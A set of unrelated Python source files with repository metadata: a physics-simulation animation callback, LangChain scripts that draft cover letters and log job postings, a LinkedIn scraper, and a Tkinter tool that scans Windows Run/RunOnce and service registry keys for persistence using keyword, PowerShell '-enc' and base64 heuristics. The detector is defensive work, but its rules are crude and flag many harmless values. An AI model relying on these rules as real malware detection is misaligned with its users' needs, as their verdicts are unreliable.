self._deregister_run(key)
except (json.JSONDecodeError, FileNotFoundError):
return
def clear_dir(self, dir):
if path.exists(dir):
rmtree(dir)
def on_propagation_begin(self) -> None:
"""At the beginning of the simulation, creates a temporary folder where to store the images and initializes the variables used to store the data.
"""
self.temp_dir = tempfile.mkdtemp()
# Register the temporary folder for deletion at exit and on SIGINT. Check if the folder exists before deleting it to avoid errors
self._clean_leftovers()
self._register_run()
atexit.register(self.clear_dir, self.temp_dir)
signal.signal(signal.SIGINT, lambda sig, frame: (self.clear_dir(self.temp_dir), self._deregister_run(), signal.default_int_handler(signal.SIGINT, None)) )
signal.signal(signal.SIGTERM, lambda sig, frame: (self.clear_dir(self.temp_dir), self._deregister_run(), signal.default_int_handler(signal.SIGTERM, None)) )
self.tensor_index = 0
if self._plot_potentials:
self._potentials = self.propagation_params["potentials"]
self._max_density = 0
self._max_densityk = 0
self._max_potential = 0
if self.propagation_params["N_iterations"]/self.save_every > 1000:
warnings.warn("The animation is going to generate many frames. Consider increasing the save_every parameter.")
def on_epoch_end(self, epoch):
"""After each epoch, if the epoch number is a multiple of ``save_every``, saves the data to the temporary folder.
Args:
epoch (int): The epoch number
"""
if epoch % self.save_every != 0:
return
time = epoch*self.propagation_params["time_step"]
self._times.append(time*1000)
if self._plot_density:
torch.save(self.gas.density.to(torch.float16), path.join(
self.temp_dir, f"density_{self.tensor_index}.torch"))
max_density = self.gas.density.max()
if max_density > self._max_density:
self._max_density = max_density
if self._plot_phase:
torch.save(self.gas.phase.to(torch.float16), path.join(
self.temp_dir, f"phase_{self.tensor_index}.torch"))
if self._plot_densityk:
torch.save(self.gas.densityk.to(torch.float16), path.join(
self.temp_dir, f"densityk_{self.tensor_index}.torch"))
max_densityk = self.gas.densityk.max()
if max_densityk > self._max_densityk:
self._max_densityk = max_densityk
if self._plot_potentials:
total_potential = sum(
potential.get_potential(self.gas.X, self.gas.Y, time) for potential in self._potentials if issubclass(type(potential), LinearPotential)
)
total_potential += sum(
potential.potential_function(self.gas.X, self.gas.Y, self.gas.psi, time) for potential in self._potentials if issubclass(type(potential), NonLinearPotential)
)
torch.save(total_potential.to(torch.float16), path.join(
self.temp_dir, f"potential_{self.tensor_index}.torch"))
max_potential = total_potential.max()
if max_potential > self._max_potential:
self._max_potential = max_potential
if len(self._cavities):
for i, cavity in enumerate(self._cavities):
self._cavities_history[i].append(
cavity.get_alpha(self.gas.psi, time=time).cpu())
if len(self._time_dependent_variables):
for i, [label, variable] in enumerate(self._time_dependent_variables):
self._tdv_history[i].append(variable(time))
self.tensor_index += 1
def _plot_stored(self, params) -> None:
"""Plots the data stored in the temporary folder.
Args:
params (list): A list of tuples of the form (image_index, time) where image_index is the index of the image to be plotted and time is the in-simulation time at which the image was saved.
"""
for param in params:
image_index, time = param
fig = plt.figure(
figsize=(6*self.n_cols, 6*self.n_rows-4*self.N_1d_plots))
gs = GridSpec(self.n_rows, self.n_cols, figure=fig,
height_ratios=self._height_ratios)
row_index = 0
col_index = 0
if self._plot_density:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.X.cpu(), self.gas.Y.cpu(), torch.load(path.join(
self.temp_dir, f"density_{image_index}.torch"), map_location="cpu"), norm=LogNorm(vmax=self._max_density, vmin=1e-10), shading='auto')
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax)
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$")
ax.set_title("Real space density")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if self._plot_phase:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.X.cpu(), self.gas.Y.cpu(), torch.load(path.join(
self.temp_dir, f"phase_{image_index}.torch"), map_location="cpu"), vmin=-np.pi, vmax=np.pi, shading='auto', cmap="bwr")
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax, format=ticker.FuncFormatter(
pi_tick_formatter), ticks=ticker.MultipleLocator(base=np.pi/2))
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$") # account for units and set title
ax.set_title("Phase")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if self._plot_densityk:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.Kx.cpu(), self.gas.Ky.cpu(), torch.load(path.join(
self.temp_dir, f"densityk_{image_index}.torch"), map_location="cpu"), norm=LogNorm(vmax=self._max_densityk, vmin=1e-10), shading='auto')
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax)
ax.set_xlabel(r"$kx$")
ax.set_ylabel(r"$ky$") # account for units and set title
ax.set_title("Momentum space density")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if self._plot_potentials:
ax = fig.add_subplot(gs[row_index, col_index])
im = ax.pcolormesh(self.gas.X.cpu(), self.gas.Y.cpu(), torch.load(path.join(
self.temp_dir, f"potential_{image_index}.torch"), map_location="cpu"), shading='auto', vmin=0, vmax=self._max_potential)
ax_divider = make_axes_locatable(ax)
cax = ax_divider.append_axes("right", size="6%", pad="2%")
cbar = plt.colorbar(im, cax=cax)
ax.set_xlabel(r"$x$")
ax.set_ylabel(r"$y$") # account for units and set title
ax.set_title("Potential landscape")
ax.set_aspect('equal')
if col_index == self.n_cols-1:
col_index = 0
row_index += 1
else:
col_index += 1
if len(self._cavities):
for i, history in enumerate(self._cavities_history, start=1):
ax = fig.add_subplot(gs[row_index, :])
ax.axvline(x=self._times[image_index], color="red")
ax.plot(self._times, np.abs(history))
ax.set_xlabel(r"$t$ [$ms$]")
ax.set_ylabel(r"$|\alpha|$") # account for units and title
ax.set_title(f"Cavity {i} field")
ax.set_xlim(0, self._times[-1])
col_index = 0
row_index += 1
ax = fig.add_subplot(gs[row_index, :])
ax.axvline(x=self._times[image_index], color="red")
ax.plot(self._times, np.angle(history))
ax.set_xlabel(r"$t$ [$ms$]")
# account for units and title
ax.set_ylabel(r"$Arg(\alpha)$")
ax.set_xlim(0, self._times[-1])
col_index = 0
row_index += 1
if len(self._time_dependent_variables):
for i, [label, variable] in enumerate(self._time_dependent_variables):
ax = fig.add_subplot(gs[row_index, :])
ax.axvline(x=self._times[image_index], color="red")
ax.plot(self._times, self._tdv_history[i])
ax.set_xlabel(r"$t$ [$ms$]")
ax.set_ylabel(r"$V$") # account for units and title
ax.set_title(label)
ax.set_xlim(0, self._times[-1])
col_index = 0
row_index += 1
if isinstance(self.propagation_params["time_step"], float):
fig.suptitle(
f"t: {time:.2f} ms")
plt.subplots_adjust(left=0.1, bottom=0.1,
right=0.9, top=0.9, wspace=0.4, hspace=0.4)
fig.savefig(path.join(self.temp_dir, f"{image_index}.png"))
plt.close(fig)
def on_propagation_end(self) -> None:
"""At the end of the simulation, generates the animation and saves it to the specified path.
"""
ctx = multiprocess.get_context("spawn")
with ctx.Pool(self.N_cores) as pool:
_ = list(tqdm(pool.imap(self._plot_stored, enumerate_chunk(self._times, int(np.ceil(len(self._times)/self.N_cores)))),
total=self.N_cores, smoothing=0, desc="Picture generation", bar_format='{l_bar}{bar}| {n_fmt}/{total_fmt}', leave=False))
print("Merging the pictures into a movie...", end="\r")
(
ffmpeg
.input(path.join(self.temp_dir, "%d.png"), framerate=self.fps)
.output(self.output_file, pix_fmt='yuv420p', vcodec='libx264')
.global_args("-nostats")
.global_args("-loglevel", "0")
.run(overwrite_output=True)
)
print(f"Animation saved to {self.output_file}")
self.clear_dir(self.temp_dir)
self._deregister_run(folder=self.temp_dir)
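# Usage sketch (paths and values are placeholders): render the density and phase while
# monitoring one cavity; note that the output folder must already exist.
# anim = Animation("out/run.mp4", save_every=5, fps=25, cores=4,
# density=True, phase=True, cavities=[cavity])
# gas.propagate(final_time=1e-3, time_step=1e-6, potentials=[cavity], callbacks=[anim])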
| 20,095 | Python | .py | 356 | 43.567416 | 353 | 0.594431 | qo-eth/TorchGPE | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,175 | setup.py | geshijoker_easycv/setup.py | from setuptools import setup, find_packages
# Read the contents of requirements.txt
with open('requirements.txt') as f:
required_packages = f.read().splitlines()
setup(
name='easycv',
version='0.0',
packages=find_packages(),
description='A Python package for easily customizing cover letters.',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
author='Ge Shi',
author_email='[email protected]',
url='https://github.com/geshijoker/easycv',
license='MIT',
install_requires=required_packages, # Include requirements from requirements.txt
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: GPL-3.0 license',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.10',
'Programming Language :: Python :: 3.11',
'Programming Language :: Python :: 3.12',
],
) | 991 | Python | .py | 26 | 32.769231 | 85 | 0.670124 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,176 | savejob.py | geshijoker_easycv/savejob.py | import argparse
parser = argparse.ArgumentParser(description="Take inputs from user to collect job position information")
parser.add_argument("--file", "-f", required=True, help="The path to load your pdf resume file")
parser.add_argument("--url", "-u", required=True, help="The url to the job page")
parser.add_argument("--key", "-k", required=True, help="The user key for the foundation model")
parser.add_argument("--model", "-m", default="gpt-3.5-turbo", choices=["gpt-3.5-turbo", "gpt-4"],
help="The foundation model you want to select to complete the task")
args = parser.parse_args()
import os
os.environ["OPENAI_API_KEY"] = args.key
from langchain_community.document_loaders import AsyncChromiumLoader
from langchain_community.document_transformers import BeautifulSoupTransformer
loader = AsyncChromiumLoader([args.url])
html = loader.load()
from langchain_community.document_transformers import Html2TextTransformer
html2text = Html2TextTransformer()
html_transformed = html2text.transform_documents(html)
from langchain_text_splitters import RecursiveCharacterTextSplitter
chunk_size = 1000
chunk_overlap = 30
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=chunk_size, chunk_overlap=chunk_overlap
)
splits = text_splitter.split_documents(html_transformed)
from langchain_community.vectorstores import Chroma
from langchain_openai import ChatOpenAI, OpenAIEmbeddings
from langchain_anthropic import ChatAnthropic
vectorstore = Chroma.from_documents(documents=splits, embedding=OpenAIEmbeddings())
import bs4
from langchain import hub
# prompt = hub.pull("rlm/rag-prompt")
llm = ChatOpenAI(model_name=args.model, temperature=0)
def format_docs(docs):
return "\n\n".join(doc.page_content for doc in docs)
from langchain_core.runnables import RunnablePassthrough
from langchain_core.prompts import ChatPromptTemplate
from langchain_core.output_parsers import StrOutputParser, CommaSeparatedListOutputParser, JsonOutputParser
from langchain_core.output_parsers.openai_functions import JsonOutputFunctionsParser
# question cannot be answered using the information provided answer with "N/A".
template = """
System:
You are an applicant for a job. Based on the job description in the {context},
you collect information to answer {question}.
If you don't know the answer, say "N/A". Keep the answer succinct.
User: What's the title of the position?
AI: Research Scientist
User: What's the working location of the position?
AI: Davis, CA
User: What's the degree requirement of the position?
AI: Bachelor's
User: How many years of working experience are required by the position?
AI: 3
User: What's the salary range of the position?
AI: $10,000/month to $12,000/month
User: Does the company sponsor a working visa?
AI: No
User: Does the company require citizenship?
AI: Yes
User: What's the experience level of the position?
AI: Senior
Context: {context}
User: {question}
AI: """
prompt = ChatPromptTemplate.from_template(template)
retriever = vectorstore.as_retriever()
rag_chain = (
{"context": retriever | format_docs, "question": RunnablePassthrough()}
| prompt
| llm
| StrOutputParser()
)
questions = [
"What's the name of the company or institution? Give me only the name.",
"What's the title of the position? Give me only the name of the title.",
"What's the working location of the position? Give me a short answer.",
"What's the degree requirement of the position? Answer in one word.",
"How many years of working experience or new graduate is required by the position? Answer in numbers.",
"What's the salary range of the position? Answer in numbers.",
"Does the company sponsor a working visa? Answer yes or no.",
"Does the company require citizenship? Answer yes or no.",
"What's the experience level of the position? For example, intern, full-time, senior, and so on. Answer in one word.",
]
csvRow = [rag_chain.invoke(question) for question in questions]
csvRow.append(args.url)
import csv
path = "job-record.csv"
fields = ["company", "position", "location", "degree requirement", "working years", "salary range", "sponsorship", "citizenship", "experience level", "link"]
if not os.path.isfile(path):
with open(path,'w') as f:
writer = csv.writer(f)
writer.writerow(fields)
with open(path,'a') as f:
writer = csv.writer(f)
writer.writerow(csvRow)
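# Example invocation (all values are placeholders):
# python savejob.py --file resume.pdf --url https://example.com/job --key sk-... --model gpt-3.5-turbo
# The answers are appended as a new row to job-record.csv in the working directory.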
| 4,370 | Python | .py | 94 | 44.361702 | 157 | 0.778799 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,177 | easycv.py | geshijoker_easycv/easycv.py | import os
import sys
import getpass
import argparse
import magic
def check_file_type(filename):
mime = magic.Magic(mime=True)
file_type = mime.from_file(filename)
if 'pdf' in file_type.lower():
return 'PDF'
elif 'msword' in file_type.lower() or 'wordprocessingml' in file_type.lower():
return 'DOC'
elif 'text' in file_type.lower():
return 'TXT'
else:
return 'Unknown'
parser = argparse.ArgumentParser(description="Take inputs from user to generate a cover letter.")
parser.add_argument("--resume", required=True,
help="The path to your resume file (txt, pdf, or doc).")
parser.add_argument("--jd", default='files/jd.txt',
help="The path to load the job description txt file.")
parser.add_argument("--user", default='files/user_cv_prompt.txt',
help="The user input txt file to guide the writing of cover letter.")
parser.add_argument("--model", "-m", default="gpt-3.5-turbo", choices=["gpt-3.5-turbo", "gpt-4"],
help="The foundation model you want to select to complete the task")
args = parser.parse_args()
# set the openai key
os.environ["OPENAI_API_KEY"] = getpass.getpass("Enter your OpenAI key: ")
from langchain_community.document_loaders import PyPDFLoader, TextLoader, ReadTheDocsLoader
from langchain_chroma import Chroma
from langchain.memory.vectorstore import VectorStoreRetrieverMemory
from langchain_text_splitters import RecursiveCharacterTextSplitter
from langchain.chains import ConversationChain, create_history_aware_retriever, create_retrieval_chain
from langchain.chains.combine_documents import create_stuff_documents_chain
from langchain_openai import ChatOpenAI, OpenAIEmbeddings
from langchain_core.output_parsers import StrOutputParser
from langchain_core.runnables import RunnablePassthrough
from langchain_core.prompts import PromptTemplate, ChatPromptTemplate, MessagesPlaceholder
from langchain_core.messages import HumanMessage
import bs4
from langchain import hub
chunk_size = 1000
chunk_overlap = 50
temperature = 0.2
# Create the LLM
llm = ChatOpenAI(model_name=args.model, temperature=temperature)
# Create rag QA of the job description
job_name = input('The title of the job: ')
company_name = input('The name of the company: ')
jd_file = open(args.jd, "r")
job_description = jd_file.read()
jd_file.close()
job_description = '\n'.join((f'The title of the job is {job_name}', f'The name of the company is {company_name}', job_description))
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=chunk_size, chunk_overlap=chunk_overlap, add_start_index=True
)
jd_splits = text_splitter.split_text(job_description)
jd_docs = text_splitter.create_documents(jd_splits)
jd_vectorstore = Chroma.from_documents(documents=jd_docs, embedding=OpenAIEmbeddings())
llm = ChatOpenAI(model_name=args.model, temperature=0.2)
jd_retriever = jd_vectorstore.as_retriever(search_type="similarity", search_kwargs={"k": 3})
def format_docs(docs):
return "\n\n".join(doc.page_content for doc in docs)
contextualize_q_system_prompt = """Given a chat history and the latest user question \
which might reference context in the chat history, formulate a standalone question \
which can be understood without the chat history. Do NOT answer the question, \
just reformulate it if needed and otherwise return it as is."""
contextualize_q_prompt = ChatPromptTemplate.from_messages(
[
("system", contextualize_q_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
jd_history_aware_retriever = create_history_aware_retriever(
llm, jd_retriever, contextualize_q_prompt
)
qa_system_prompt = """You are an assistant for question-answering tasks. \
Use the following pieces of retrieved context to answer the question. \
If you don't know the answer, just say that you don't know. \
keep the answer concise.\
{context}"""
qa_prompt = ChatPromptTemplate.from_messages(
[
("system", qa_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
question_answer_chain = create_stuff_documents_chain(llm, qa_prompt)
jd_rag_chain = create_retrieval_chain(jd_history_aware_retriever, question_answer_chain)
# keep recording the chat history
chat_history = []
# questions on the job descriptions
questions = [
"What's the name of the company?",
"What's the culture of it?",
"What's the value mission of the company?",
"What's the title of the job?",
"What are the requirements of it, including but not limited to degree, citizenship and skills?",
"What are the job responsibilities of it?",
]
for question in questions:
msg = jd_rag_chain.invoke({"input": question, "chat_history": chat_history})
chat_history.extend([HumanMessage(content=question), msg["answer"]])
# Load the resume and QA on resume
re_file = open(args.resume, "r")
re_file_type = check_file_type(args.resume)
if re_file_type == 'PDF':
loader = PyPDFLoader(args.resume)
elif re_file_type == 'DOC':
loader = ReadTheDocsLoader(args.resume)
elif re_file_type == 'TXT':
loader = TextLoader(args.resume)
else:
sys.exit(f"The file type of {args.resume} is not supported.")
re_pages = loader.load_and_split(text_splitter)
re_file.close()
re_vectorstore = Chroma.from_documents(documents=re_pages, embedding=OpenAIEmbeddings())
docs = re_vectorstore.similarity_search("What are the schools the applicant attended?", k=3)
re_retriever = re_vectorstore.as_retriever(search_type="similarity", search_kwargs={"k": 3})
re_system_prompt = """You are an applicant for a job with the given resume. \
Use the following pieces of retrieved context to answer questions about yourself towards the job. \
If you don't know the answer, just say that you don't know. \
keep the answer concise.\
{context}"""
re_prompt = ChatPromptTemplate.from_messages(
[
("system", re_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
re_question_answer_chain = create_stuff_documents_chain(llm, re_prompt)
re_rag_chain = create_retrieval_chain(re_retriever, re_question_answer_chain)
# resume questions
questions = [
"Do you meet the degree requirement of the job?",
"What projects did you do that show the required skills of the job, and why?",
"Can you show you are a good cultural fit for the job?",
"Did you work or intern in the company before? If so, tell me what position it was and what project you did."
]
for question in questions:
msg = re_rag_chain.invoke({"input": question, "chat_history": chat_history})
chat_history.extend([HumanMessage(content=question), msg["answer"]])
# based on the chat history, create a customized cover letter for the job
cv_system_prompt = """You are an applicant (with a resume) for a job (with a job description). \
Write in the first person.
Use the chat history context and human input instruction to generate a cover letter customized for the job. \
If any message is negative for the job application, do not include it in the cover letter. \
If any information such as the referrer or the start date is unknown, leave a placeholder for the user to fill in. \
keep the answer concise with a maximum of 4 paragraphs and 500 words.\
"""
cv_prompt = ChatPromptTemplate.from_messages(
[
("system", cv_system_prompt),
MessagesPlaceholder("chat_history"),
("human", "{input}"),
]
)
user_file = open(args.user, "r")
user_input = user_file.read()
cv_chain = (
cv_prompt
| llm
| StrOutputParser()
)
cover_letter = cv_chain.invoke({"input": user_input, "chat_history": chat_history})
# Save the written cover letter to output file
output_names = ["cover_letter", "_".join(job_name.strip().split()), "_".join(company_name.strip().split())]
output_file = '-'.join(output_names) + '.txt'
with open(output_file, "w") as f:
f.writelines(cover_letter)
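# Example invocation (file paths are placeholders):
# python easycv.py --resume files/resume.pdf --jd files/jd.txt --user files/user_cv_prompt.txt
# The script prompts for the OpenAI key, the job title and the company name, then writes
# cover_letter-<job>-<company>.txt to the working directory.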
| 8,020 | Python | .py | 173 | 42.971098 | 131 | 0.738016 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,178 | linkedin_scraper.py | geshijoker_easycv/linkedin_scraper.py | import requests
import os
import json
from selenium import webdriver
from bs4 import BeautifulSoup
# url = 'https://arxiv.org/abs/2404.04253'
# URL to scrape
def single_page_scraper(url):
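# Renders the page in a Selenium-driven Chrome session, parses the resulting HTML with
# BeautifulSoup and dumps the <body> markup to jd.txt; the structured LinkedIn
# extraction below is left commented out.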
# Send a GET request to the URL
driver = webdriver.Chrome()
driver.get(url)
# html = requests.get(url).response
html = driver.page_source
# Parse the HTML content using BeautifulSoup
soup = BeautifulSoup(html, 'html.parser')
body = soup.body
print(body)
# text = body.get_text(separator=' ', strip=True)
with open("jd.txt", "w") as file:
file.writelines(str(body))
# # Extract contents based on the provided web structure descriptions
# # body = soup.find('body', class_='render-mode-BIGPIPE nav-v2 ember-application icons-loaded boot-complete')
# body = soup.find('body')
# print(body)
# div_application_outlet = body.find('div', class_='application-outlet')
# div_authtication_outlet = div_application_outlet.find('div', class_='authtication_outlet')
# div_scaffold_layout = div_authtication_outlet.find('div', class_='scaffold-layout scaffold-layout--breakpoint-xl scaffold-layout--list-detail scaffold-layout--reflow scaffold-layout--has-list-detail jobs-search-two-pane__layout')
# div_scaffold_layout_inner = div_scaffold_layout.find('div', class_='scaffold-layout__row scaffold-layout__content scaffold-layout__content--list-detail')
# scaffold_layout_main = div_scaffold_layout_inner.find('main', id='main')
# div_scaffold_layout_container = scaffold_layout_main.find('div', class_='scaffold-layout__list-detail-container')
# div_scaffold_layout_detail = div_scaffold_layout_container.find('div', class_='scaffold-layout__list-detail-inner scaffold-layout__list-detail-inner--grow')
# div_scaffold_layout_detail_overflow = div_scaffold_layout_detail.find('div', class_='scaffold-layout__detail overflow-x-hidden jobs-search__job-details')
# div_job_search = div_scaffold_layout_detail_overflow.find('div', class_='jobs-search__job-details--wrapper')
# div_job_search_container = div_job_search.find('div', class_='jobs-search__job-details--container')
# div_job_view_layout = div_job_search_container.find('div', class_='job-view-layout jobs-details')
# div_job_view_firstchild = div_job_view_layout.find_all('div')[0]
# div_job_detail_main = div_job_view_firstchild.find('div', class_='jobs-details__main-content jobs-details__main-content--single-pane full-width')
# div_job_detail_all_children = div_job_detail_main.find_all('div')
# div_job_detail_firstchild = div_job_detail_all_children[0]
# div_job_detail_secondchild = div_job_detail_all_children[1]
# div_t_14 = div_job_detail_firstchild.find('div', class_='t-14')
# div_relative_job_detail = div_t_14.find('div', class_='relative job-details-jobs-unified-top-card__container--two-pane')
# div_relative_job_firstchild = div_relative_job_detail.find_all('div')[0]
# div_position = div_relative_job_firstchild.find('div', class_='display-flex justify-space-between flex-wrap')
# div_job_detail_unified = div_relative_job_firstchild.find('div', class_='job-details-jobs-unified-top-card__primary-description-container')
# div_mt2_mb2 = div_relative_job_firstchild.find('div', class_='mt2 mb2')
# div_mt2_mb2_ul = div_mt2_mb2.find('ul')
# div_mt2_mb2_ul_li = div_mt2_mb2_ul.find_all('li')
# div_mt2_mb2_job_type = div_mt2_mb2_ul_li[0]
# div_mt2_mb2_company = div_mt2_mb2_ul_li[1]
# div_mt2_mb2_alumni = div_mt2_mb2_ul_li[2]
# div_mt2_mb2_skills = div_mt2_mb2_ul_li[3]
# div_jobs_box = div_job_detail_secondchild.find('div', class_='jobs-box--fadein jobs-box--full-width jobs-box--with-cta-large jobs-description jobs-description--reformatted mt4')
# div_jobs_description_container = div_jobs_box.find('div', class_='jobs-description__container')
# div_jobs_description_content = div_jobs_description_container.find('div', class_='jobs-description__content jobs-description-content')
# div_jobs_box_content = div_jobs_description_content.find('div', id='job-details')
# div_mt4 = div_jobs_box_content.find('div', class_='mt4')
# return div_mt2_mb2_job_type.text, div_mt2_mb2_company.text, div_mt2_mb2_alumni.text, div_mt2_mb2_skills.text, div_mt4.text
single_page_scraper('https://www.linkedin.com/jobs/search/?alertAction=viewjobs¤tJobId=3767462861&f_E=2%2C3&f_TPR=r86400&geoId=90000084&keywords=machine%20learning&location=&origin=JOB_SEARCH_PAGE_SEARCH_BUTTON&refresh=true')
| 4,548 | Python | .py | 59 | 72.457627 | 235 | 0.721813 | geshijoker/easycv | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,179 | detectpersist.py | kaotickj_persistenceDetector/detectpersist.py | import tkinter.font as tkFont
import tkinter as tk
from tkinter import messagebox
import winreg
import base64
import re
import string
class RegistryCheckerApp:
def __init__(self, root):
# setting title
root.title("Registry Persistence Detector")
#setting window size
width=600
height=400
screenwidth = root.winfo_screenwidth()
screenheight = root.winfo_screenheight()
alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
root.geometry(alignstr)
root.resizable(width=False, height=False)
menubar = tk.Menu(root)
root.config(menu=menubar)
file_menu = tk.Menu(menubar, tearoff=0)
menubar.add_cascade(label="Menu", menu=file_menu)
file_menu.add_command(label="About", command=self.show_about)
file_menu.add_command(label="Help", command=self.show_help)
output_label=tk.Label(root)
ft = tkFont.Font(family='Times',size=11)
output_label["font"] = ft
output_label["fg"] = "#333333"
output_label["justify"] = "center"
output_label["text"] = "Results: "
output_label.place(x=20,y=100,width=70,height=25)
self.output_text=tk.Text(root)
ft = tkFont.Font(family='Times',size=11)
self.output_text["font"] = ft
self.output_text["fg"] = "#333333"
self.output_text.place(x=10,y=130,width=574,height=200)
check_button=tk.Button(root)
check_button["bg"] = "#e9e9ed"
ft = tkFont.Font(family='Times',size=11)
check_button["font"] = ft
check_button["fg"] = "#000000"
check_button["justify"] = "center"
check_button["text"] = "Check Registry"
check_button.place(x=240,y=340,width=110,height=25)
check_button["command"] = self.check_registry
options_label=tk.Label(root)
ft = tkFont.Font(family='Times',size=11)
options_label["font"] = ft
options_label["fg"] = "#333333"
options_label["justify"] = "center"
options_label["text"] = "Scan Options :"
options_label.place(x=20,y=30,width=90,height=25)
options_powershell=tk.Checkbutton(root)
ft = tkFont.Font(family='Times',size=11)
options_powershell["font"] = ft
options_powershell["fg"] = "#333333"
options_powershell["justify"] = "center"
options_powershell["text"] = "Powershell Commands"
options_powershell.place(x=80,y=60,width=170,height=25)
options_powershell["offvalue"] = "1"
options_powershell["onvalue"] = "0"
options_powershell["command"] = self.options_powershell_command
options_encoded=tk.Checkbutton(root)
ft = tkFont.Font(family='Times',size=11)
options_encoded["font"] = ft
options_encoded["fg"] = "#333333"
options_encoded["justify"] = "center"
options_encoded["text"] = "Encoded Payloads"
options_encoded.place(x=320,y=60,width=170,height=25)
options_encoded["offvalue"] = "1"
options_encoded["onvalue"] = "0"
options_encoded["command"] = self.options_encoded_command
def check_registry(self):
self.output_text.delete(1.0, tk.END)
malicious_entries = self.get_malicious_entries()
if malicious_entries:
self.output_text.insert(tk.END, "Malicious registry persistence detected:\n\n")
for entry in malicious_entries:
self.output_text.insert(tk.END, f"Location: {entry[0]}, Name: {entry[1]}, Data: {entry[2]}\n\n")
# Alert the user
alert_message = "Malicious registry persistence detected. Please review the output.\n"
alert_message += "To delete the found keys, follow these steps:\n"
alert_message += "1. Press Win + R, type 'regedit', and press Enter to open the Registry Editor.\n"
alert_message += "2. Navigate to the location mentioned in the output.\n"
alert_message += "3. Right-click on the malicious key and select 'Delete'.\n"
alert_message += "4. Confirm the deletion if prompted.\n"
messagebox.showwarning("Alert", alert_message)
else:
self.output_text.insert(tk.END, "No malicious registry persistence found.\n")
def get_malicious_entries(self):
persistence_locations = [
(winreg.HKEY_CURRENT_USER, [
r"Software\Microsoft\Windows\CurrentVersion\Run",
r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
r"Software\Microsoft\Internet Explorer\Extensions",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_LOCAL_MACHINE, [
r"Software\Microsoft\Windows\CurrentVersion\Run",
r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
r"System\CurrentControlSet\Services",
r"Software\Microsoft\Internet Explorer\Extensions",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_CLASSES_ROOT, [
r"Directory\Background\ShellEx\ContextMenuHandlers",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_USERS, [
r"S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run",
# Add more locations as needed based on your analysis
]),
(winreg.HKEY_USERS, [
r"S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run",
# Add more locations as needed based on your analysis
]),
# Add more user keys as needed
]
malicious_entries = []
for root_key, locations in persistence_locations:
for location in locations:
try:
with winreg.OpenKey(root_key, location, 0, winreg.KEY_READ) as key:
num_values = winreg.QueryInfoKey(key)[1]
for i in range(num_values):
value_name, value_data, _ = winreg.EnumValue(key, i)
if self.is_malicious(value_name, value_data):
malicious_entries.append((location, value_name, value_data))
except Exception as e:
print(f"Error accessing registry location {location}: {e}")
return malicious_entries
def is_malicious(self, value_name, value_data):
# Implement logic to determine if a registry entry is malicious
if re.search(r"malware|virus|trojan|keylogger", value_name, re.IGNORECASE) or \
re.search(r"malware|virus|trojan|keylogger", value_data, re.IGNORECASE):
return True
if self.is_base64_encoded(value_data):
return True
if self.is_powershell_command(value_data):
return True
# Add more checks as needed
return False
def is_powershell_command(self, data):
# Check if the data contains PowerShell commands or suspicious strings
if re.search(r"powershell|-enc", data, re.IGNORECASE):
return True
return False
def is_base64_encoded(self, data):
try:
decoded_data = base64.b64decode(data)
# Check if the decoded data is printable ASCII
return all(chr(byte) in string.printable for byte in decoded_data)
except Exception:
return False
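# Example (sketch): base64.b64encode(b"powershell") == b"cG93ZXJzaGVsbA==", so
# is_base64_encoded("cG93ZXJzaGVsbA==") returns True; any string whose decoded bytes
# happen to be printable will also match, so this check is a heuristic.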
def options_powershell_command(self):
self.output_text.insert(tk.END, "Scan for Powershell Commands Enabled\n")
def options_encoded_command(self):
self.output_text.insert(tk.END, "Scan for Encoded Commands Enabled\n")
def show_about(self):
messagebox.showinfo("About", "This application is developed by Kaotick Jay for detecting and remediating malicious registry persistence.")
def show_help(self):
messagebox.showinfo("Help", "To use this application, simply click the 'Check Registry' button to detect any malicious registry persistence.")
if __name__ == "__main__":
root = tk.Tk()
app = RegistryCheckerApp(root)
root.mainloop()
| 8,260 | Python | .py | 167 | 38.688623 | 150 | 0.621391 | kaotickj/persistenceDetector | 8 | 4 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
